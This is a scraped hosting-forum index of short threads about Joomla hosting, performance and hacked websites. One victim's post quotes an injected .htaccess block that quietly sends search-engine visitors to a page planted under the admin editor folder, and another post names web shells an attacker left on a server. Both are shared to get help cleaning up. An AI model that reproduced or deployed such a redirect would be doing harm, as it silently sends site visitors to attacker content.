Joomla Website Get Hacked
Aug 7, 2007
One of my clients has joomla site installed on his hosting.
But recently his website always get hacked. Hacker put one index.html file in the public_html folder. luckily they not deleting file and database..
This is happen twice in one week, even he change the cpanel password to a more complex one...
anyway to prevent this? any way to harden the security?
View 16 Replies
ADVERTISEMENT
Apr 21, 2008
Any recommendations for a joomla website hosting?
Multiple domains one one account and such...
View 11 Replies
View Related
Oct 25, 2009
I'm promting a new Joomla! website and a new vBulletin forum. The website serves to news articles, some statistics (related to a football club) and also a small photo and video gallery. The forum would have an average of 40-50 online users.
I'm considering to choose the baby package offered by Host Gator. Would that be a good choice?
View 10 Replies
View Related
Apr 21, 2008
Is a joomla website hosted on windows a safe option.
View 2 Replies
View Related
Jul 27, 2007
So I'm interviewing with a company and when I typed in the URL to their website, I was met with a nasty surprise: a "hacked by so and so" message! However, after looking closer, I see that I had accidentally appended a period (".") to the end of the domain name, for example: http://www.example.com./
When I removed the period, the site appeared as normal. I don't know anything about the server other than it's IIS. Is there anything I can suggest to them when I go in to interview? I'd like to point this out to them; it may even help my chances at landing the job! (It's not related to networking, though.)
View 0 Replies
View Related
Apr 30, 2009
Just this week, I believe one of my site has been hacked...or potentially my whole server! When accessing the website (a vBulletin forum), instead of going to the main page, we get a screen that looks like Window's "My Computer" and there is a scan running. Firefox has blocked the site for suspicion.
I am stumped. Where to begin? I have full SSH access to my server (after rebooting it). Thank you in advance.
Server: CentOS Linux 4.3
View 10 Replies
View Related
Aug 14, 2008
my site is hacked regularly
today when i checked htaccess file i found
Code:
# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_-]+.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24). [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)=
RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /admin/editor/filemanager/browser/default/images/ucohex/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c
in it what does this code does.
View 24 Replies
View Related
Apr 24, 2007
I have been getting a lot of abusive email lately, just deleted them and thought nothing off it. Just about to go to bed and I see my website has been hacked.
www.pic-spot.com
They also said they were after www.anotherlaugh.com and www.shinyproxy.com
View 5 Replies
View Related
Jun 27, 2009
few sites are continously been hacked, these sites i m working on, whenever i connect the sites through FTP client(i m using Flash FXP) and upload the files the very next day the index file have the Iframe code written after the body tag by someone else of some malware site.
i have tried everything, changing the password on daily basis,even reinstall my system completey(thinking if there any backdoor trojan) firewall and antivirus,
View 13 Replies
View Related
Jul 18, 2009
We have a simple flash site. Not CMS or anything of that sort.
Recently out site was hacked. Nothing malicious as the only code that seems to have changed was out index file in which they injected a malware script ....
View 13 Replies
View Related
May 11, 2007
This is the second time this week that my website was hacked. On the first hack attempt they somehow got into my cpanel and corrupted my license file which I had my host fix. Other than that the only damage done was an html file that replaced my main page. Then today, I find that my website has been further compromised, but by a completely different group. The first hacker was g3n3t1x and this second hack was done by www.turkishdefacerteam.com
Now, the problem is my sites dedicated IP is 72.36.192.150, and my domain name is gamingguilds.net, but if you resolve the domain name, it resolves to 74.53.52.66. I have checked my nameservers and everything is set properly. But the thing I don't get is that when you type in my domain name in a web browser, you see my website. How can it be resolving to the wrong IP and STILL show my website. Also note that when you type in my dedicated IP it would still show my website (before this second attack).
Now after the second attack, my dedicated IP no longer works, I cant get into cpanel using the IP, I cant get into my FTP account, and I get view my website. Yet if you use the domain name to log into cpanel or view the website it works. The strange part here is that I can't get into the FTP using the domain name.
SO, if you go to [url]you see a blank cpanel site, if you go to [url] you get a 404 error, and if you go to www.gamingguilds.net you get my website.
View 14 Replies
View Related
Jun 14, 2009
I have a small but somewhat popular space-history website. Very simple HTML that I typed into wordpad, but it has long pages full of photos. Since 2003, I've been using media3.net with their business-class Windows service.
A few weeks ago, mypages were hacked, and a one line script inserted that called an Adobe Flash file. Apparently this was a server-wise attack, not just my web pages. Media3.net cleaned this up, but now it has happened again.
This is bad, because Google blacklists my site, and folks on Wikipedia get upset because there are a lot of links to my site.
How are they breaking in to media3.net? I think I must change hosts, but I don't want to put my image-intensive site on overbooked hardware with limited bandwidth.
View 14 Replies
View Related
Feb 19, 2007
my server was hacked by Cold he/she inserted a couple of scripts that enabled remote access into a 777 permission folder.
i found the following script names:
back.pl
cpanel.php
cgitelnet.pl
cpanel.pl
gcc-cold <- shell script
i have deleted all the above files, and changed the folder chmod to 755
but the weird thing is, through shell, when i try to locate the file gcc-cold i get this:
Quote:
root@ [/tmp]# locate gcc-cold
/home/ns5f6/public_html/uploads/gcc-cold
root@ [/tmp]# rm /home/ns5f6/public_html/uploads/gcc-cold
rm: cannot lstat `/home/ns5f6/public_html/uploads/gcc-cold': No such file or directory
isn't locate NOT supposed to find that file after its been deleted? and if it was not deleted some how, isn't it supposed to delete it? am i missing something here??????
from a bit of researching the files, i found that it was a telnet script, BUT i have telnet disabled, and there's no process running along side GREP TELNET
how can i find malicious software or shell scripts that allow such hacking activities on the server?
View 6 Replies
View Related
Jan 30, 2009
I am currently on a host that is offering unlimited bandwidth, however they are not that great as the site keeps going slow.
View 18 Replies
View Related
May 10, 2009
I am in charge of making a website for a charter school. Where I stand right now is I am going to use Joomla, and I assume Fantastico. Now where I am still stuck is with a webhost. Every time I locate one that sounds good (editor's picks, and such), I read the feedback comments and find tons of complaints. Can someone recommend one please. Under $10; user friendly; accepts Paypal would be very helpful. I went to get Bluehost, as an example, from some reviews I read, and then I read the feedback section. I don't think I understand the terms enough to make a choice on my own,
View 14 Replies
View Related
Dec 9, 2008
I currently have a VPS in the UK that I host my clients joomla sites off and the specs of this VPS server are as below:
- 20 GB SA-SCSI Disk Space
- 350GB bandwidth
- Full root access / Parallels/WHM/cPanel
- 2 Dedicated IPs
- 384 MB SLM RA
I am now running around 10 joomla based sites off of this VPS, 5-6 of which are Ecommerce based sites. Whilst I am probably only using 10gb of the overall disk-space so far, in terms of performance, should I continue to add clients to this server or should I keep the more hungry sites on this server and move some of the less resource intensive non-ecommerce sites to another VPS? Or would it be in my best interest to upgrade to a Dedicated server where I will have all my own resources?
View 6 Replies
View Related
May 20, 2008
I have a joomla site running on a new unmanaged VPS at FutureHosting.biz and it is performing very poorly.
I am not a server admin but i copy the same CMS and database to a shared account i have access to and the site runs much faster. That shared account happens to be a SiteGround server which if possible, i would like to stay away from.
I have had bad experience with SG so i am contemplating, MidPhase, as an option for VPS support.
I was also considering LunarPages and HostGator but their recent datacenter problems and poor reviews i want to stay away from them as well.
I really want to find a quality host who has experience managing large joomla based sites.
View 13 Replies
View Related
May 7, 2008
Is it good security wise?
View 11 Replies
View Related
Jun 1, 2008
I have installed joomla and now i m installing some extension but when i install extension i m getting error ------------>
JFolder::create: Path not in open_basedir paths
Unable to create destination
View 1 Replies
View Related
Jun 15, 2008
I am going to start a new personal / business website which will feature articles along with pictures and few videos, all managed through Joomla. I recently visited the official Joomla forum and found a thread which posted guidelines on choosing a proper Joomla hosting.
forum.joomla.org/viewtopic.php?t=95678
3. The most security conscious hosts turn PHP's Register Globals directive OFF by default. The next best allow you to turn it off in local .htaccess or php.ini files. A host that requires you to run a site with Register Globals ON should be avoided. This is true for any PHP enabled site, whether or not you are running Joomla!. There is a legitimate argument to be made by hosts for keeping Register Globals ON for PHP4 sites. This is that it would break too much legacy code. This argument should not be accepted for a PHP5 installation. Beginning with PHP5, the official PHP recommendation was to keep Register Globals is OFF. Note that beginning with PHP6, there will not even be a Register Globals setting, so don't get caught in a Register Globals backwater. Modify your code to work without Register Globals, and choose a host that encourages such practices.
6. Be sure users on your shared server can't view each other's files and databases, for example through shell accounts and cpanels.
7. Choose a host that provides real information about security compromises, rather than simply shutting your site down. Check their user forums for evidence of how they've responded to cracks in the past. A good host may for example, inform you immediately that a security breach has occurred and will quarantine the problem file for you, while leaving it there for further investigation. A poor host will shut your site down and provide very limited information on why. Watch out! All too many do this.
8. Be sure you have access to raw server logs. Reading these logs is a vital part of site security and recovery.
9. Choose a host that limits the number of users per machine and the average CPU load per machine to some reasonable number (depending on hardware). Be sure they proactively move user sites as needed to balance load. Check the number of domains on a server using reverse IP lookup.
10. Choose a host that manages it's own data center. Check the data center infrastructure, such as redundant Internet access, hot swappable backups, full daily backups, environment and access controls, emergency generators, etc.
11. Check that your host is not at risk of having its IP addresses blocked because it hosts porn or SMAM sites.
What alarmed me was #3, #6-#11
My Question is, how the hell am I supposed to check for these flaws? I thought I was going to settle down with Hostgator or Hostmonster, but now I am not sure.
If Hostmonster or Hostgator do not meet these requirement, can someone be kind enough to suggest some?
I don't expect that much of traffic, so I want to keep the budget minimal: below $8. I know that by limiting this budget, I am limiting the quality of hosting, but I am not ready to commit my resource to my first site: just an experimentation of my limits.
View 10 Replies
View Related
Dec 4, 2008
I currently have a VPS server and I run a lot of joomla based sites for my clients and having done a bit of research, mediatemple has come up as being a well-recommended hosting provider for joomla based installations in the sense that the servers are all ready and configured for joomla, where chmodding does not need to be done once a joomla installation has been done - something I find very tedious after each joomla install.
Can anyone recommend a Manage VPS provider that would fully support Joomla from the point of when its first installed and its ready to go like I have said above and also be able to keep the joomla sites running optimal performance.
View 3 Replies
View Related
Sep 30, 2008
I was a victim/winner due to slashdot yesterday. My site, www.electricalengineer.com runs Joomla hosted through Rackforce's dds-400l package. We thought we were under attack yesterday, but later found it to be the slashdot effect. Anyhow, google analytics show ~5700 visitors. This doesn't seem like it would be enough to slow the server to a halt, but it did. Rackforce suggested that we upgrade to a more powerful package. I'm not sure though that the following should have slowed us down: Dual Quad-Core Xeon
1GB DDR2 ECC 667 RAM
30GB on SAS/SCSI
10Mbps Dedicated Unmetered
anyone else have performance issues with Joomla?
View 9 Replies
View Related
Jul 15, 2007
I have a big joomla no profit site on a shared host.
Actually the site has 1500/2000 unique at month with 10.000/12.000 pages at day.
Not to much the consume of bandwith.. we have not viedo or heavy images or audio files.. so we consume 12/13 gb at month.
Probabily in the next month we cold grow for ten times... with 15.000 or more unique at day.
So in this vps must be only one site.
How much much ram could be necessary? 512?
Two things that we use.. Cpanel or Plesk ot manage this site and a daily backup on the server but we need to download a backup even 3 or 4 days in our local pc.
View 8 Replies
View Related
Feb 15, 2007
I'm getting ready to upgrade my site to Joomla and am learning all these things about security issues. For example, the register globals on my webserver is turned on and I can't turn it off unless I go to a dedicated server and pay 3X per month of what I'm paying now. And there's other things too about this particular webhost.
Just wondering if anyone can give any input from experience on who is a good webhost for a Joomla site with regards to security, etc.
View 9 Replies
View Related
Apr 23, 2007
I have a VPS account that keeps going down. I am on VPS account with 7GB and 128MB/192MB. I have one site running a Joomla manged website. The other site just host pictures, and receive emails. So about a two site for emails. One site for pictures and one Site serving Joomla based website. The control panel is CPANEL/WHM. I asked my provider why this keeps happening and they are stating CPANEL is a memory hog and would recommend I go to there next available plan that has 256MB. My question is does this sound like the memory should be an issue for such a small VPS Server. I plan on adding more sites and possible some E-Commerce. BUt there next plan up seems like it would be to small 12GB 256. I was thinking of ging with GODADDY Vps account.
View 9 Replies
View Related
Nov 2, 2008
I'm hungarian and my english is not very well. So I'm looking for a free hosting with the most space (for videos etc.) and in which Joomla can run correctly. I've been looking for a hosting like this for weeks now but I couldn't find any. I would be really grateful if anyone can show me a hosting like that.
View 3 Replies
View Related
Mar 23, 2009
I am developing my website and the standard htaccess is for SearchEngineFriendly URL's with Joomla.
I have chosen to have a blog with Wordpress... only in Wordpress I can't get the SearchEngineFriendly URL's... because then the Joomla site doens't work anymore...
Does anyone have suggestions for a solution? So I need a HTACCESS file where as well Joomla as Wordpress can generate SEF Url's.
View 1 Replies
View Related
Jun 5, 2009
What is the worst host for Joomla?
Had a problem with your Joomla site? Which host were you with and what was the problem?
View 14 Replies
View Related
Apr 17, 2009
I am in the process of creating a site for my family, which is spread out around the world. I am using Joomla and have built my site on Siteground as my host.
My site will have low traffic, for family only, but I want my family to be able to post pictures, chat and blog.
I am very happy with Siteground but it has come to my attention that even though they offer 750gb of space I can only have up to 5gb of picture files (gif, jpg, etc.) I feel that I will eventually exceed this and being new at the whole site creation, I do not want to risk data being lost (database, files, etc.) when the time comes to transfer to a new host.
The site is not active yet as I am still working out the kinks and adding more pages. I figure if I am going to make a move to another host now would be the best time.
So I guess the question I have is what hosts, in your opinions, would be the best for the site I explained and still be able to work in Joomla.
View 14 Replies
View Related
Dec 3, 2008
i have a problem with disable posix function
when i disable posix functions, joomla cms not installed and if the web site found with joomla cms in server that site have problem.
can you help me to manage a secure server with out any problem.
View 1 Replies
View Related
Apr 21, 2008
How do I, and is it even possible to host a joomla based website on a windows server.
View 14 Replies
View Related